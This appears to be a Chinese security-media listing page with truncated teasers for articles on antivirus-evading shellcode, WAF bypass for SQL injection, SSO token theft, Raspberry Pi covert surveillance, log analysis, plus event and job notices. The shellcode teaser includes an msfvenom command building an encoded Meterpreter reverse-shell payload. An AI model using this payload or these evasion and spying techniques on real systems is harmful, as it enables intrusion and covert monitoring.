安全脉搏

高质量的全球互联网安全媒体和技术平台,安全技术爱好者最佳的交流社区。

3726人订阅
shellcode加密过杀软 前言  致谢Slyon表哥,谢谢表哥一直愿意教我这个垃圾。 前提准备 环境准备: Windows7 32 位系统 Shellcode 使用 kali linux Metasploit 生成 shellcode Windows7 需要安装的软件: Python2.7 pip install pyinstaller pip install pywin32 VCForPython27.msi(微软官网可以下载) 制作流程 1. 查IP地址  查看自己的使用监听MSF的IP地址 10.1.5.10 2. 生成shellcode  红色字体需要修改成自己的ip地址和需要监听的端口号。 msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp_uuid LPORT=``x`` LHOST=``x.x.x.x`` -e   x86/shikata_ga_nai -i 11 -f py -o samny.py 3. 替换shellco...
0109相约本地生活安全沙龙暨白帽子颁奖典礼!   本地生活安全沙龙   “烎”原义光明,形容一个人斗志昂扬、热血沸腾。   以“安全·烎领”为主题,为安全同行搭建交流平台,探讨互联网安全的技术发展与当下最新、最热的技术话题,为行业未来安全发展开拓思路,共同完善本地生活安全生态。   继本地生活安全沙龙在上海成功举办后,阿里巴巴本地生活安全响应中心确定于2020年1月9日(周四)在上海再次举办本地生活安全沙龙暨白帽子颁奖典礼。此次颁奖典礼由本地生活资深副总裁 黄眉做开场致辞,特邀多位信息安全专家为与会嘉宾分享,届时将有近200位各行业安全专家参与,共同探讨企业安全实践新技术。   活动时间:2020.01.09 活动地点:上海静安区四季酒店 (参会嘉宾有机会获得本地生活...
助力能源数字化 能源数据中心与网络信息安全展将于明年3月在京举办 助力能源数字化  能源数据中心与网络信息安全展将于明年3月在京举办 为大力推进数字经济与能源变革深度融合发展,促进智慧能源创新发展,保障国家能源网络信息安全。在国家相关部委的支持下,中国电力企业联合会、中国通信企业协会、中国智慧能源产业联盟等单位将于2020年3月31日-4月2日在北京・中国国际展览中心(静安庄馆)共同举办“2020中国国际智慧能源暨能源数据中心与网络信息安全装备展览会”(以下简称“展会”)。 2019年12月10日上午,中电联副秘书长沈维春、中国贸促会建设行业分会副会长贾槐、中电联会展处副处长/中国贸促会电力行业委员会副秘书长魏武、中国智慧能源产业联盟执行秘书长赫然、中国机电产品进出口商会太阳能光伏...
Nginx日志安全分析脚本 此脚本是参考nmgxy/klionsec修改而来,重新添加了一些特征,只用来临时救急,还是推荐到ELK或者Splunk中分析   Github:https://github.com/al0ne/nginx_log_check   功能 统计Top 20 地址 SQL注入分析 SQL from查询统计 常见扫描器、黑客工具分析 漏洞利用检测 敏感路径访问 Webshell HTTP Tunnel 寻找响应长度的url Top 20 寻找罕见的脚本文件访问 寻找302跳转的脚本文件 二次验证,判断状态吗与url后缀排除静态资源(png/css/js/pdf/jpg等url后缀) Usage 设置报告保存地址 outfile=/tmp/logs  设置日志分析目录 access_dir=/var/log/nginx/  设置日志名称 access_log=access  chmod u+x ./nginx_check.sh./n...
利用树莓派来监视任务目标(上) 严正声明:本文仅用于技术探讨,严禁用于其他非法途径。 前言 "黑客"注重的是隐蔽高效的攻陷目标,那么前期的信息收集,以及踩点就是非常总要的了,如何使用树莓派来"监视"目标对象呢?当你想知道某个地方的他在做什么?想要知道家里面是否进了小偷?家里的那个她是否给你带了绿帽子?(写道这里我哭了出来,为什么我没有女朋友!哇~) 硬件清单 读卡器以及 SD 卡 摄像头一枚 SSH连接工具 域名一个 带公网服务器一台 电源(实际场景需要装个充电宝或者使用定制的电源) 监听模块(如果想要带上声音可以装个) 成品图是这样的 刷系统以及换源之类的可以看我另一篇文章,这里就不做其他概述了! 开启摄像头模块 进入配置中 sudo ...
2020中国国际网络安全博览会暨高峰论坛 盛大启航 2020中国国际网络安全博览会暨高峰论坛 盛大启航 为推进网络强国建设进程,立足于开放环境维护网络安全,加强国际交流合作,上海市信息网络安全管理协会牵头,(ISC)2上海分会、国家计算机网络应急技术处理协调中心等联合组织的“2020中国国际网络安全博览会暨高峰论坛“ 定于2020年4月16日-18日在上海新国际博览中心举办。 本次博览会围绕网络安全在“智慧城市”建设中的先锋作用,倡导“政策分享、技术合作、产品展示、市场推广、项目落地”,开展广泛交流对接,通过专家研讨、对接洽谈、成果展示、人才交流等形式,形成技术创新、产业发展、人才高地的良性生态。 高峰论坛将邀请院士、专家、企业家等重量级嘉宾,就国际智慧城市安全,网络安全...
浪潮云安全招聘——安全工程师、Java研发工程师 安全工程师(济南)15w-25w/年 岗位描述:(攻防两个方向均可以) 1、负责云中心的安全事件的应急响应、溯源分析; 2、负责云中心的安全检测/防御系统的运维、日志分析; 3、负责日常漏洞挖掘、业务上线前检测; 4、落地云中心的安全基建工作。 任职要求: 1、大学本科以上学历,计算机相关专业,熟悉常见的安全漏洞(Web、系统)的原理、危害、利用方式及解决方案; 2、熟悉常见入侵事件的处理流程以及溯源分析思路; 3、熟悉常见脚本语言,具备独立对应用进行黑盒、白盒安全测试以及web漏洞挖掘能力; 4、熟悉java代码审计优先; 5、有丰富CTF比赛经验优先; 6、在各大漏洞平台/SRC上报过高危漏洞或有CVE证书优先; 7、具有踏实的工作心态、良好...
Bypass宝塔防火墙和云锁SQL注入钓鱼站 前言 某天收到一封邮件 一看就是钓鱼邮件,并且我也不玩LOL。 看了看感觉这个系统好像见过很多次,研究了一下,顺手日了下来 过程比较有意思,遇到了不少坑,写篇文章记录一下。 正文 信息搜集 打开网站首先我们可以看到他的炫酷界面 进一步搜集信息发现有宝塔+云锁,找不到后台,旁站全是这种钓鱼站,均使用了冒充官网的子域名前缀 手工试了下发现有注入,但是有云锁 万能Bypass 还是利用星球里提过的增加垃圾数据包的方法来bypass,屡试不爽,思路就是增加垃圾数据 构造好post包后用sqlmap跑,发现有布尔盲注 本来以为就要完事了,结果sqlmap最后提示注入失败 emmmmmm,看一下发现被封了IP 换个IP后,增大delay的数值,想了想他有可能是...
漏洞挖掘 | 单点登录的网站通过Referer盗取用户授权 最近参加了一个赏金计划,然后在单点登录中发现了一个涉及比较多站点的漏洞,测试过程比较有意思,所以分享一下。 基础解答: 一般我们在挖洞的时候,很关键的就是要观察数据流,你可以选择用burp,当然也可以使用浏览器的F12(俗称浏览器F12大法)来观察数据流向。 以下将用户中心登录站点称为passport.AAA.com,用户在登陆*.AAA.com的时候可以选择先登录passport.AAA.com,然后它会返回授权,接着用户就能登录*.AAA.com了。 当然我一般都是先登录了,然后再去点击这个链接,接着默默观察浏览器都请求了啥玩意。 你可以发现其中的一个请求长成下面这个样子: https://passport.AAA.com/sso/accounts/serviceLogin?continue=http://subdomain.AAA....
安服实战的小技巧 把自己做安服的几个小Tips记录一下,以前做攻防出身的我,最近忙于安全服务,一脸的懵逼,对于安全服务,目标是固定的,不能够横向渗透,也不能纵向渗透,就是硬刚,各大官网主站头疼的不行,但是每次都能发现几个比较有意思的漏洞,所以记录一下 1、YinHang主站,一般采用成熟的cms,纯静态页面展示,前后台分离,此时我们没有必要把所有的精力放到纯静态页面,去找其他的业务,比如地图功能、招聘功能等 2、YinHang主站以java为主,各种路径真的想都想不到,但是真的会有一些开发会把后台某个功能的路径写到js里面,所以好好看一下js,如果能找到后台路径一般会存在后台部分功能未授权访问、进而导致存储XSS、后台SQL注入等漏洞 3、官网主站...